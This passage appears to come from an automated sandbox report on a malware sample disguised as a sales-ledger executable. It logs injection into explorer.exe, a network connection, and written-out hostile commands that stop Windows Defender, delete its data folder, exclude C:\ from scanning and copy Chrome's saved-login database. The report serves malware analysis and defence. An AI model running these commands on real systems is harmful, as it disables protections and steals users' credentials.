Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D47016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D47016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D94015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D94015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CCB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CCB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CCB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D541E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CFA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CF61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D469A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04CEB944 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmmon32.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.90 80
Source: C:\Windows\explorer.exe	Domain query: www.seniorlivingcaelderly.com

Adds a directory exclusion to Windows Defender

Show sources

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\cmmon32.exe	Thread register set: target process: 3388

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe

Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 960000

Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe

Code function: 9_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V

Source: explorer.exe, 00000019.00000000.318115996.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
